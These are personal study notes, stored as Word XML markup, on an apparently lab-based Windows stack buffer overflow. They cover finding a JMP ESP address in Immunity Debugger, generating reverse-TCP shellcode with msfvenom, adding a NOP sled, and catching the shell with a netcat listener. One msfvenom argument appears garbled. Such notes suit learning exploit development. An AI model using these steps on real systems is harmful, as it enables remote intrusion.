      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x11\x50\x62.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7AF4BE" w14:textId="0A9E2A09" w:rsidR="00A7444A" w:rsidRDefault="00A7444A" w:rsidP="00835A0B">
      <w:r>
        <w:t>REMEMBER THAT ^ \ It’s in reverse. X86 architecture – Little endian format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041DE5D5" w14:textId="05CE567F" w:rsidR="00835A0B" w:rsidRDefault="00835A0B" w:rsidP="00835A0B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i0.wp.com/tcm-sec.com/wp-content/uploads/2019/05/22.png?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="143659C0" wp14:editId="76CC0348">
            <wp:extent cx="5943600" cy="2922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2905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D90659" w14:textId="3BD577B9" w:rsidR="005C3A44" w:rsidRDefault="005C3A44" w:rsidP="00835A0B"/>
    <w:p w14:paraId="075EC38F" w14:textId="3FB6E285" w:rsidR="005C3A44" w:rsidRDefault="005C3A44" w:rsidP="00835A0B">
      <w:r>
        <w:t xml:space="preserve">This should throw the same error as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>before, but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will hit a jump point. We can catch this in immunity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0854833D" w14:textId="5CD476C4" w:rsidR="00835A0B" w:rsidRDefault="004C048D" w:rsidP="004C048D">
      <w:r>
        <w:t>Open immunity again, click on the arrow on the top:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD34B6" w14:textId="20C7F356" w:rsidR="004C048D" w:rsidRDefault="009F19F3" w:rsidP="004C048D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B37EF35" wp14:editId="673CC113">
            <wp:extent cx="5715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1-04 at 6.01.07 PM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="571500" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7202260A" w14:textId="6DB002F3" w:rsidR="009F19F3" w:rsidRDefault="009F19F3" w:rsidP="004C048D">
      <w:r>
        <w:t>Enter the expression: 625011af, that’s our jump code. If we hit okay, we should find the FFE4 JMP ESP, perfect! We’re going to hit F2 to turn it Blue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E25E8" w14:textId="284727A4" w:rsidR="009F19F3" w:rsidRDefault="009F19F3" w:rsidP="004C048D">
      <w:r>
        <w:t>We have now set a break point. We’re going to overflow the buffer, but if we hit that specific spot, don’t jump to further instruction but instead wait for us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC88349" w14:textId="43617703" w:rsidR="005C12CB" w:rsidRDefault="005C12CB" w:rsidP="004C048D"/>
    <w:p w14:paraId="0D1F92B9" w14:textId="4F7AB00C" w:rsidR="005C12CB" w:rsidRDefault="00A8181D" w:rsidP="004C048D">
      <w:r>
        <w:t>When we run it, we can see that the EIP leads to the JMP ESP.</w:t>
      </w:r>
      <w:r w:rsidR="002F5A2F">
        <w:t xml:space="preserve"> Now to write a shellcode!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB3F972" w14:textId="64D697A0" w:rsidR="002F5A2F" w:rsidRDefault="002F5A2F" w:rsidP="002F5A2F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GENERATING SHELLCODE AND GAIN SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3675781C" w14:textId="77777777" w:rsidR="002F5A2F" w:rsidRDefault="002F5A2F" w:rsidP="002F5A2F"/>
    <w:p w14:paraId="16F0DAE4" w14:textId="3A765438" w:rsidR="00A8181D" w:rsidRDefault="002F5A2F" w:rsidP="002F5A2F">
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to generate shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6889B18C" w14:textId="234BDE20" w:rsidR="002F5A2F" w:rsidRDefault="00C26978" w:rsidP="002F5A2F">
      <w:r>
        <w:t xml:space="preserve">-p payload – windows, shell reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095471F" w14:textId="6D8C56F3" w:rsidR="00C26978" w:rsidRDefault="00C26978" w:rsidP="002F5A2F">
      <w:r>
        <w:t xml:space="preserve">EXITFUNC = thread </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> make our exploit a little more stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF0A256" w14:textId="34C1633E" w:rsidR="00C26978" w:rsidRDefault="00C26978" w:rsidP="002F5A2F">
      <w:r>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file type, export to c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A09033B" w14:textId="68BE6234" w:rsidR="00C26978" w:rsidRDefault="00C26978" w:rsidP="002F5A2F">
      <w:r>
        <w:t xml:space="preserve">-a </w:t>
      </w:r>
      <w:r w:rsidR="00567A16">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00567A16">
        <w:t xml:space="preserve"> architecture (x86)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACA5AE7" w14:textId="2917A75D" w:rsidR="00567A16" w:rsidRDefault="00567A16" w:rsidP="002F5A2F">
      <w:r>
        <w:t xml:space="preserve">-b </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bad characters </w:t>
      </w:r>
      <w:r w:rsidR="00977A98">
        <w:t>(in this case, we only had the null byte as bad characters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064FF233" w14:textId="5B2E97CF" w:rsidR="00C26978" w:rsidRDefault="00C26978" w:rsidP="002F5A2F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=&lt;ip&gt; LPORT=4444 EXITFUNC=thread -f c -a x86 -b “</w:t>
      </w:r>
      <w:r w:rsidR="00B568F4">
        <w:t>\x</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidR="00B568F4">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B568F4">
        <w:t>xSO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B568F4">
        <w:t xml:space="preserve"> ON</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE405E8" w14:textId="0CC3957D" w:rsidR="00333A14" w:rsidRDefault="00333A14" w:rsidP="002F5A2F"/>
    <w:p w14:paraId="464A87CB" w14:textId="3726A40A" w:rsidR="00333A14" w:rsidRDefault="00335630" w:rsidP="002F5A2F">
      <w:r>
        <w:t xml:space="preserve">Copy and paste the shellcode into our script (no need to copy the semicolon at the end, or unsigned char </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[] =)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B253B" w14:textId="3CBD597E" w:rsidR="00335630" w:rsidRDefault="00335630" w:rsidP="002F5A2F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Take note of the payload size just in case, you could be working with limited space. In this case 351 bytes. </w:t>
      </w:r>
      <w:r w:rsidR="005B065C">
        <w:br/>
        <w:t>Open python script and edit it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E72DD" w14:textId="17C7BB43" w:rsidR="005A0C1F" w:rsidRDefault="005A0C1F" w:rsidP="005A0C1F">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i2.wp.com/tcm-sec.com/wp-content/uploads/2019/05/25.png?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C577B7" wp14:editId="4188EB72">
            <wp:extent cx="2976011" cy="342368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652" cy="3430173"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFE0683" w14:textId="559982ED" w:rsidR="005A0C1F" w:rsidRDefault="003D4EB4" w:rsidP="002F5A2F">
      <w:r>
        <w:t>Overflow = our shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4095FC" w14:textId="136E6A4D" w:rsidR="003D4EB4" w:rsidRDefault="003D4EB4" w:rsidP="002F5A2F">
      <w:r>
        <w:t xml:space="preserve">Shellcode = 2003 bytes, that gets us to the EIP, when we get to the EIP we’re </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gonna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hit this pointer address that leads to the JMP address, the set of instructions that we’re providing is that overflow. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0B57C" w14:textId="62137650" w:rsidR="003D4EB4" w:rsidRDefault="003D4EB4" w:rsidP="002F5A2F">
      <w:r>
        <w:t xml:space="preserve">Add NOPS, “\x90 * 32” </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0069488B">
        <w:t>We’re adding a little bit of pad space in</w:t>
      </w:r>
      <w:r w:rsidR="003171F7">
        <w:t xml:space="preserve"> between the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003171F7">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003171F7">
        <w:t xml:space="preserve"> command and overflow shellcode. </w:t>
      </w:r>
      <w:r w:rsidR="001F4CDA">
        <w:t>If we didn’t have this, our overflow might not work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAEC8FC" w14:textId="34BCC001" w:rsidR="001F4CDA" w:rsidRDefault="0002209A" w:rsidP="002F5A2F">
      <w:r>
        <w:t xml:space="preserve">Set up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to listen: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nlvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF4CE12" w14:textId="39D3E9B5" w:rsidR="004A01A3" w:rsidRDefault="004A01A3" w:rsidP="002F5A2F">
      <w:r>
        <w:t>run the server again as administrator, no need to have it in immunity this time. Run script!</w:t>
      </w:r>
      <w:r w:rsidR="003A3F29">
        <w:t xml:space="preserve"> SHELL!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004A01A3" w:rsidSect="0032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053FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A446B0F4"/>
    <w:lvl w:ilvl="0" w:tplc="98C8DD40">
      <w:start w:val="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31315"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2CFE6972"/>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B3"/>
    <w:rsid w:val="0002209A"/>
    <w:rsid w:val="00043152"/>
    <w:rsid w:val="0004794C"/>
    <w:rsid w:val="000679D6"/>
    <w:rsid w:val="00087057"/>
    <w:rsid w:val="000E6958"/>
    <w:rsid w:val="000F6BDF"/>
    <w:rsid w:val="001C4027"/>
    <w:rsid w:val="001D167E"/>
    <w:rsid w:val="001F4CDA"/>
    <w:rsid w:val="002F5A2F"/>
    <w:rsid w:val="003171F7"/>
    <w:rsid w:val="0032132A"/>
    <w:rsid w:val="00333A14"/>
    <w:rsid w:val="00335630"/>
    <w:rsid w:val="00342FAC"/>
    <w:rsid w:val="0034443E"/>
    <w:rsid w:val="0037374A"/>
    <w:rsid w:val="00375EE7"/>
    <w:rsid w:val="003A328D"/>
    <w:rsid w:val="003A3F29"/>
    <w:rsid w:val="003D4EB4"/>
    <w:rsid w:val="004247B7"/>
    <w:rsid w:val="00440237"/>
    <w:rsid w:val="00455EC0"/>
    <w:rsid w:val="004808AE"/>
    <w:rsid w:val="004A01A3"/>
    <w:rsid w:val="004C048D"/>
    <w:rsid w:val="004C2223"/>
    <w:rsid w:val="004D7B3B"/>
    <w:rsid w:val="0053766A"/>
    <w:rsid w:val="005429F5"/>
    <w:rsid w:val="00567A16"/>
    <w:rsid w:val="00586818"/>
    <w:rsid w:val="005A0C1F"/>
    <w:rsid w:val="005B065C"/>
    <w:rsid w:val="005C12CB"/>
    <w:rsid w:val="005C3A44"/>
    <w:rsid w:val="005D63F3"/>
    <w:rsid w:val="005E6743"/>
    <w:rsid w:val="005F3F13"/>
    <w:rsid w:val="00613C02"/>
    <w:rsid w:val="0062138D"/>
    <w:rsid w:val="00624F69"/>
    <w:rsid w:val="0063584C"/>
    <w:rsid w:val="00636E4B"/>
    <w:rsid w:val="00652D80"/>
    <w:rsid w:val="00670BD8"/>
    <w:rsid w:val="00675C12"/>
    <w:rsid w:val="00690BBC"/>
    <w:rsid w:val="0069488B"/>
    <w:rsid w:val="006D31C9"/>
    <w:rsid w:val="007251B3"/>
    <w:rsid w:val="00730423"/>
    <w:rsid w:val="007E2B1B"/>
    <w:rsid w:val="00835A0B"/>
    <w:rsid w:val="00842DCF"/>
    <w:rsid w:val="0086612D"/>
    <w:rsid w:val="008A6A4C"/>
    <w:rsid w:val="008B77CC"/>
    <w:rsid w:val="008E2615"/>
    <w:rsid w:val="008F72A2"/>
    <w:rsid w:val="00973E47"/>
    <w:rsid w:val="0097780C"/>
    <w:rsid w:val="00977A98"/>
    <w:rsid w:val="00995333"/>
    <w:rsid w:val="009A0ADD"/>
    <w:rsid w:val="009B2066"/>
    <w:rsid w:val="009B60AB"/>
    <w:rsid w:val="009F19F3"/>
    <w:rsid w:val="00A455A0"/>
    <w:rsid w:val="00A7444A"/>
    <w:rsid w:val="00A74E9F"/>
    <w:rsid w:val="00A8181D"/>
    <w:rsid w:val="00AD1C6C"/>
    <w:rsid w:val="00AF739C"/>
    <w:rsid w:val="00B02966"/>
    <w:rsid w:val="00B53EA6"/>
    <w:rsid w:val="00B568F4"/>
    <w:rsid w:val="00BD1449"/>
    <w:rsid w:val="00C05DB0"/>
    <w:rsid w:val="00C22344"/>
    <w:rsid w:val="00C26978"/>
    <w:rsid w:val="00C37A5C"/>
    <w:rsid w:val="00CA2AEA"/>
    <w:rsid w:val="00CC739F"/>
    <w:rsid w:val="00CC7E81"/>
    <w:rsid w:val="00CF2297"/>
    <w:rsid w:val="00D1003E"/>
    <w:rsid w:val="00D137FD"/>
    <w:rsid w:val="00DF4A52"/>
    <w:rsid w:val="00E31133"/>
    <w:rsid w:val="00EB5A23"/>
    <w:rsid w:val="00EC7C0F"/>
    <w:rsid w:val="00EC7C15"/>
    <w:rsid w:val="00EF18AA"/>
    <w:rsid w:val="00F97070"/>
    <w:rsid w:val="00FB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CA95"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{64F5287F-D9E5-8445-9B47-1E631519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1B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580900">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="993099171">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1269655165">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1364860729">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1397361617">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1498886994">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1618102595">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1718434026">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1866215947">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20916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Abouzeid</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Elias Abouzeid</cp:lastModifiedBy>
  <cp:revision>95</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-04T23:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-13T17:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>